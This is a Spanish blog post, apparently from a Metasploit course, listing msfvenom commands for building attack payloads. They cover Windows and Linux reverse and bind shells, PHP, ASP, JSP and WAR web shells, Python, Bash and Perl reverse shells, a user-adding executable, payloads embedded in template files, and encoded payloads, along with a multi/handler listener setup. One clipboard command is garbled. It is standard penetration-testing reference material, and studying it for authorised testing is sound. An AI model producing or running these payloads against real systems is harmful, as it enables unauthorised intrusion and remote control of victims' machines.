0

Msfvenom, creando diferentes tipos de payloads

Difunde No Solo Hacking!

En el curso de hacking con Metasploit, veíamos cómo usar msfvenom para infectar distintos sistemas operativos. A continuación os dejo una lista de payloads que podéis generar para los distintos entornos.

# Crear un payload
msfvenom -p [payload] LHOST=[IPAtacante] LPORT=[PuertoEscucha]

# Listar payloads
msfvenom -l payloads

# Listar opciones de payloads
msfvenom -p [payload] --list-options
msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

# Crear un payload encodeado
msfvenom -p [payload] -e [encoder] -f [FormatoSalida] -i [iteración]  > ArchivoResultante

# Crear un payload usando una plantilla
msfvenom -p [payload]  -x [Plantilla] -f [FormatoSalida] > ArchivoResultante

# Poner a la escucha Payloads en Metasploit:
msf6>use exploit/multi/handler  
msf6>set payload windows/meterpreter/reverse_tcp  
msf6>set lhost [IP]  
msf6>set lport  [Puerto] 
msf6> set ExitOnSession false  
msf6>exploit -j  

#  Payloads para Windows 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f exe > shell.exe    
msfvenom -p windows/meterpreter_reverse_http LHOST=[IPAtacante] LPORT=[PuertoEscucha] HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe    
msfvenom -p windows/meterpreter/bind_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f exe > shell.exe    
msfvenom -p windows/shell/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f exe > shell.exe    
msfvenom -p windows/shell_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f exe > shell.exe

#  Payloads para Linux 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f elf > shell.elf    
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f elf > shell.elf    
msfvenom -p linux/x64/shell_bind_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f elf > shell.elf    
msfvenom -p linux/x64/shell_reverse_tcp RHOST=[IPRemota] LPORT=[PuertoEscucha] -f elf > shell.elf

# Add a user in windows with msfvenom: 
msfvenom -p windows/adduser USER=[usuario] PASS=[password] -f exe > adduser.exe

#  Generar Web Payloads

# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f asp > shell.asp

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f war > shell.war

#  Payloads en formato script 

# Lenguaje Python
msfvenom -p cmd/unix/reverse_python LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.py

# Lenguaje Bash
msfvenom -p cmd/unix/reverse_bash LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.sh

# Lenguaje Perl
msfvenom -p cmd/unix/reverse_perl LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f raw > shell.pl

# Crear un payload encodeado borrando los caracteres malos:
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=[IPAtacante] LPORT=[PuertoEscucha] -f c -e x86/shikata_ga_nai -b "\x0A\x0D"


Difunde No Solo Hacking!

Carlos Melantuche

Leave a Reply

Your email address will not be published. Required fields are marked *

80 + = 89